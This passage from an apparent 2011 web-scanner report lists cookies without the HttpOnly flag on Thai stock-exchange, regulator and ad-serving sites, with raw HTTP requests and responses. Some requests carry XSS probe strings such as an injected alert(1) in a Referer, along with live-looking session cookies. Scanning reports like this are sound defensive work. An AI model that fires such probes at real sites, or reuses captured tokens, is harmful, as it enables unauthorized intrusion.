Cookie: verify=test; JSESSIONID=43232749D73AAABE886C359DBDB883E0; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

symbol=xss&image32.x=0&image32.y=0

Response

8.3. http://weblink.settrade.com/actions/customization/IPO/setIndexHome.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://weblink.settrade.com
Path:	/actions/customization/IPO/setIndexHome.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=B267E470DE7DC2A26B6659CA2AF0C018.tcipo2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /actions/customization/IPO/setIndexHome.jsp HTTP/1.1
Host: weblink.settrade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moneychannel.co.th/
Cookie: JSESSIONID=99FF897E4A873AB6C9CA5B3AB7752149.tcipo2

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:37:17 GMT
Set-Cookie: JSESSIONID=B267E470DE7DC2A26B6659CA2AF0C018.tcipo2; Path=/
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 12320

<html>
<head>
<title>::SETTRADE::</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<meta http-equiv="Cache-Control" content="no-cache, must-revalidat
...[SNIP]...

8.4. http://weblink.settrade.com/actions/customization/IPO/tfexHome_en.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://weblink.settrade.com
Path:	/actions/customization/IPO/tfexHome_en.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=104D6977DB8C724EB46CD261473A2ADF.tcipo2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /actions/customization/IPO/tfexHome_en.jsp HTTP/1.1
Host: weblink.settrade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moneychannel.co.th/
Cookie: JSESSIONID=99FF897E4A873AB6C9CA5B3AB7752149.tcipo2

Response

8.5. http://www.mymemorysafe.com/RSS2HTMLPro.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mymemorysafe.com
Path:	/RSS2HTMLPro.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCQATQBST=CJIPFAODGDKMFBCDOJAIGGKP; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RSS2HTMLPro.asp HTTP/1.1
Host: www.mymemorysafe.com
Proxy-Connection: keep-alive
Referer: http://www.mymemorysafe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whxd3rnvc4hjzp45k0nhmh55; __utmz=211617801.1304453582.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=211617801.1268033327.1304453582.1304453582.1304453582.1; __utmc=211617801; __utmb=211617801.2.10.1304453582

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15011
Content-Type: text/html
Expires: Tue, 03 May 2011 15:13:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQATQBST=CJIPFAODGDKMFBCDOJAIGGKP; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:14:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<me
...[SNIP]...

8.6. http://www.sec.or.th/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sec.or.th
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=E290B581823F96597A3E2C7C8CB81FE7; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/regulations/cg/roles_p1.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:59:29 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
Set-Cookie: JSESSIONID=E290B581823F96597A3E2C7C8CB81FE7; Path=/
Content-Length: 147
Content-Type: text/html;charset=ISO-8859-1

<html>
<script language="javascript">
//document.location="/view/king2010.html"
document.location="/view/view.jsp?lang=th"
</script>
</html>

8.7. http://www.sec.or.th/view/truehitsstat.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sec.or.th
Path:	/view/truehitsstat.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=F5B1E9C341C29D58049B57FB78667562; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /view/truehitsstat.jsp?pagename=SEC%20Home%20Page HTTP/1.1
Host: www.sec.or.th
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=thcdf1c'%3balert(1)//9465eb3d2be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:45:26 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
Set-Cookie: JSESSIONID=F5B1E9C341C29D58049B57FB78667562; Path=/
Content-Length: 257
Content-Type: text/html;charset=utf-8

<style type="text/css">

</style>
<script language="javascript1.1">page="SEC Home Page";</script>
<script language="javascript1.1" src="http:/
...[SNIP]...

8.8. http://www.sec.or.th/view/view.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sec.or.th
Path:	/view/view.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=C028BE300AB1D863D9A32BEB707CB147; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /view/view.jsp?lang=th HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/
Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147

Response

8.9. http://www.set.or.th/set/newsdetails.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.set.or.th
Path:	/set/newsdetails.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=C1251254A60333D6A74A6EE27A20EAF5; Path=/set

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.10. http://www.set.or.th/set/newsrelease.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.set.or.th
Path:	/set/newsrelease.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=98250DBF0F80A8A183DFC98113CEF009; Path=/set

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.11. http://www.set.or.th/set/oppdaybyperiod.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.set.or.th
Path:	/set/oppdaybyperiod.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=54F91FCDB4DAE1F4AA35C30AFFB2AE74; Path=/set

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set/oppdaybyperiod.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/contact/contact.html
Cookie: verify=test; JSESSIONID=848EE6E20D1B204AF56BED170E0F93BC; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:24:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=54F91FCDB4DAE1F4AA35C30AFFB2AE74; Path=/set
Content-Length: 113070

<html>
<head>
<link href="/set/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...

8.12. http://www.set.or.th/set/xcalendar.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.set.or.th
Path:	/set/xcalendar.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=385C9B270EE7772989674DAB14DE42EF; Path=/set

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set/xcalendar.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/xcalendar.do?language=en&country=US
Cookie: verify=test; JSESSIONID=54F91FCDB4DAE1F4AA35C30AFFB2AE74; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=7

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:35:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=385C9B270EE7772989674DAB14DE42EF; Path=/set
Content-Length: 70943

<html>
<head>
<link href="/set/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...

8.13. http://www.thai-iod.com/en/index.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.thai-iod.com
Path:	/en/index.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAQRSTSCC=ANGFCNPDPIFOFHFHKGPCEDAA; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/index.asp HTTP/1.1
Host: www.thai-iod.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.thai-iod.com/

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:03:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Content-Length: 42090
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQRSTSCC=ANGFCNPDPIFOFHFHKGPCEDAA; path=/
Cache-control: private



<html>
<head>
<title>Thai Institute of Directors</title>
<meta http-equiv="Content-Type" content="text/html;charset=TIS-620">

...[SNIP]...

8.14. http://banner2.set.or.th/www/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://banner2.set.or.th
Path:	/www/delivery/afr.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OAID=7c8556a43aae7af00d76d52cd35eab33; expires=Wed, 02-May-2012 14:23:47 GMT; path=/
OAVARS[a2713007]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22121%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%228%22%3B%7D; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/afr.php?n=a2713007&zoneid=8&target=_blank&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: banner2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/head-en.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAID=7c8556a43aae7af00d76d52cd35eab33; OAVARS[ad76ba36]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22133%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%227%22%3B%7D; OAVARS[a2713007]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22133%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%228%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:23:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=7c8556a43aae7af00d76d52cd35eab33; expires=Wed, 02-May-2012 14:23:47 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAVARS[a2713007]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22121%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%228%22%3B%7D; path=/
Content-Length: 1354
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>CLICK2WIN2011</title>
<script type='text/javascript' src='http://banner2.set.or.th/www/delivery/fl.js'></script></head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginhe
...[SNIP]...

8.15. http://banner2.set.or.th/www/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://banner2.set.or.th
Path:	/www/delivery/afr.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OAID=7c8556a43aae7af00d76d52cd35eab33; expires=Wed, 02-May-2012 14:23:32 GMT; path=/
OAVARS[ad76ba36]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22131%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%227%22%3B%7D; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/afr.php?n=ad76ba36&zoneid=7&target=_blank&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: banner2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAID=7c8556a43aae7af00d76d52cd35eab33; OAVARS[ad76ba36]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22121%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%227%22%3B%7D; OAVARS[a2713007]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22133%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%228%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:23:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=7c8556a43aae7af00d76d52cd35eab33; expires=Wed, 02-May-2012 14:23:32 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAVARS[ad76ba36]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22131%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%227%22%3B%7D; path=/
Content-Length: 1528
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>.............................. "Silver Futures ............................................................ ..................................................................
...[SNIP]...

8.16. http://banner2.set.or.th/www/delivery/ck.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://banner2.set.or.th
Path:	/www/delivery/ck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=7c8556a43aae7af00d76d52cd35eab33; expires=Wed, 02-May-2012 14:43:24 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ck.php?oaparams=2__bannerid=134__zoneid=8__cb=5442c3a54c__oadest=http://www.set.or.th/chalard_orm HTTP/1.1
Host: banner2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://banner2.set.or.th/www/delivery/afr.php?n=a2713007&zoneid=8&target=_blank&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAID=7c8556a43aae7af00d76d52cd35eab33; OAVARS[ad76ba36]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22133%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%227%22%3B%7D; OAVARS[a2713007]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22133%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%228%22%3B%7D

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 14:43:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=7c8556a43aae7af00d76d52cd35eab33; expires=Wed, 02-May-2012 14:43:24 GMT; path=/
Location: http://www.set.or.th/chalard_orm
Content-Length: 0
Content-Type: text/html

8.17. http://banner2.set.or.th/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://banner2.set.or.th
Path:	/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=7c8556a43aae7af00d76d52cd35eab33; expires=Wed, 02-May-2012 14:23:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=133&campaignid=131&zoneid=7&loc=http%3A%2F%2Fwww.set.or.th%2Fen%2Findex.html&cb=a1d2f338d2 HTTP/1.1
Host: banner2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://banner2.set.or.th/www/delivery/afr.php?n=ad76ba36&zoneid=7&target=_blank&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAID=7c8556a43aae7af00d76d52cd35eab33; OAVARS[ad76ba36]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22133%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%227%22%3B%7D; OAVARS[a2713007]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22133%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%228%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:23:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=7c8556a43aae7af00d76d52cd35eab33; expires=Wed, 02-May-2012 14:23:35 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

8.18. http://c.statcounter.com/t.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.statcounter.com
Path:	/t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

is_unique=sc2226915.1303083753.0-1656416.1303217091.0-6426596.1303907356.0-6811643.1304301905.0-2251237.1304340422.0-3970533.1304350017.0-2856750.1304384564.0-5143465.1304435963.0; expires=Sun, 01-May-2016 15:19:23 GMT; path=/; domain=.statcounter.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=5143465&resolution=1920&h=1200&camefrom=http%3A//www.mymemorysafe.com/forgetpassword.aspx&u=http%3A//www.mymemorysafe.com/Subscription.aspx&t=MemorySafe%20Pricing%20-%20Subscriptions%20and%20Copies&java=1&security=99825454&sc_random=0.8342518559657037&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.mymemorysafe.com/Subscription.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique_1=sc6761715.1303907356.0; is_unique=sc2226915.1303083753.0-1656416.1303217091.0-6426596.1303907356.0-6811643.1304301905.0-2251237.1304340422.0-3970533.1304350017.0-2856750.1304384564.0

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:19:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc2226915.1303083753.0-1656416.1303217091.0-6426596.1303907356.0-6811643.1304301905.0-2251237.1304340422.0-3970533.1304350017.0-2856750.1304384564.0-5143465.1304435963.0; expires=Sun, 01-May-2016 15:19:23 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.19. http://yesvideo.app101.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://yesvideo.app101.hubspot.com
Path:	/salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT140=1729172652.0.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: yesvideo.app101.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.yesvideo.com/OrderStatus/track_your_dvd.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 498
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=EHNDOnYozQEkAAAAODQ1MDYxNWUtN2FhZi00OGEyLWEzZTgtNWNiM2UzOTc0Y2Ji0; expires=Wed, 02-May-2012 15:14:11 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=b69bfa5f-a2ea-4924-af51-3a637beccedc; domain=yesvideo.app101.hubspot.com; expires=Mon, 03-May-2021 05:00:00 GMT; path=/; HttpOnly
Date: Tue, 03 May 2011 15:14:10 GMT
Set-Cookie: HUBSPOT140=1729172652.0.0000; path=/

var hsUse20Servers = true;
var hsDayEndsIn = 45948;
var hsWeekEndsIn = 477948;
var hsMonthEndsIn = 2465148;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-03 11:14
...[SNIP]...

8.20. http://zeus.flexserving.com/apps/serve/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://zeus.flexserving.com
Path:	/apps/serve/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=b432be22da47a85ca24aca2652dc7c1a; expires=Wed, 02-May-2012 14:40:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

